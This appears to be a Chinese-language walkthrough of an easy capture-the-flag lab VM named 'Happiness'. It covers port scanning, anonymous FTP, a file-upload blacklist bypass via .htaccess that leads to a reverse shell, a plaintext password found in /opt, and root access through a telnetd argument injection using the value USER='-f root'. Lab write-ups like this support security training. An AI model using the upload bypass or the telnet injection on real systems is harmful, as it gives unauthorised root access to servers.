Mazesec_Happiness

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0020s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0015s latency).
MAC Address: 08:00:27:AA:CF:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.59
Host is up (0.00054s latency).
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.02 seconds

靶机IP：192.168.2.59

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.59                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800
Nmap scan report for 192.168.2.59
Host is up (0.00045s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds

开放端口：22、21、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p21,22,80 192.168.2.59                                                                 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800
Nmap scan report for 192.168.2.59
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.2.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.90 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.59                                                                                        
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:18 +0800
Nmap scan report for 192.168.2.59
Host is up (0.00065s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 113.26 seconds

二、WEB渗透

1、21端口-FTP

经过扫描，发现ftp可以使用匿名登录

┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.59
Connected to 192.168.2.59.
220 Have fun!
Name (192.168.2.59:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||61476|)
150 Here comes the directory listing.
dr-xr-xr-x    2 0        0            4096 Jan 22 12:27 .
dr-xr-xr-x    2 0        0            4096 Jan 22 12:27 ..
-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
226 Directory send OK.
ftp> cat readme.txt
?Invalid command.
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||43481|)
150 Opening BINARY mode data connection for readme.txt (20 bytes).
100% |****************************************************************************************************************************************|    20        1.21 KiB/s    00:00 ETA
226 Transfer complete.
20 bytes received in 00:00 (1.14 KiB/s)
ftp> exit
221 Goodbye.

┌──(root㉿kali)-[~/miaosec]
└─# cat cat readme.txt 
http://tmpfile.dsz/

找到域名tmpfile.dsz

2、80网站

访问80端口，发现没有东西

三、文件上传

访问域名tmpfile.dsz

尝试上传一个反弹shell的脚本，提示无法上传，经过测试发现是黑名单过滤

.htaccess解析漏洞

上传反弹shell脚本

成功获取到权限

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.59] 37200
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取Echo权限

在/opt目录下面找到Eecho用户的密码

www-data@Happiness:/home/Eecho$ cat /opt/Eecho_pass.txt 
Eecho:2VQzte2RBr8p8MuOA0Gw2Sum

成功获取到Eecho的权限

www-data@Happiness:/home/Eecho$ su Eecho
Password: 
Eecho@Happiness:~$ id
uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)

2、获取root权限

查看本地监听的端口

Eecho@Happiness:~$ ss -tlnup
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port   
udp     UNCONN   0        0                0.0.0.0:68            0.0.0.0:*      
udp     UNCONN   0        0              127.0.0.1:7             0.0.0.0:*      
udp     UNCONN   0        0              127.0.0.1:9             0.0.0.0:*      
udp     UNCONN   0        0              127.0.0.1:13            0.0.0.0:*      
udp     UNCONN   0        0              127.0.0.1:19            0.0.0.0:*      
udp     UNCONN   0        0              127.0.0.1:37            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:19            0.0.0.0:*      
tcp     LISTEN   0        32               0.0.0.0:21            0.0.0.0:*      
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:23            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:37            0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:7             0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:9             0.0.0.0:*      
tcp     LISTEN   0        10             127.0.0.1:13            0.0.0.0:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      
tcp     LISTEN   0        128                    *:80                  *:* 

发现开放着23端口，尝试进行连接

Eecho@Happiness:~$ telnet 127.0.0.1
bash: telnet: command not found
Eecho@Happiness:~$ busybox telnet 127.0.0.1

Entering character mode
Escape character is '^]'.


Linux 4.19.0-27-amd64 (localhost) (pts/1)

Happiness login: 

最新的漏洞CVE-2026-24061

验证是否存在

Eecho@Happiness:~$ dpkg -S /usr/sbin/telnetd && telnetd --version
inetutils-telnetd: /usr/sbin/telnetd
telnetd (GNU inetutils) 2.0
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

telnetd (GNU inetutils) 2.0符合要求，尝试进行利用

USER='-f root' telnet -a 127.0.0.1 23

成功获取到root权限

Eecho@Happiness:~$ USER='-f root' busybox telnet -a 127.0.0.1 23

Entering character mode
Escape character is '^]'.


Linux 4.19.0-27-amd64 (localhost) (pts/1)

Last login: Thu Jan 22 23:44:10 EST 2026 from 192.168.1.12 on pts/0
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@Happiness:~# id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

root@Happiness:~# cat /root/root.txt /home/Eecho/user.txt 
flag{root-b52bb1635e544c3f968822ab6c7a745d}
flag{user-c2fdb0243cc742b18dcb4e5e68eed318}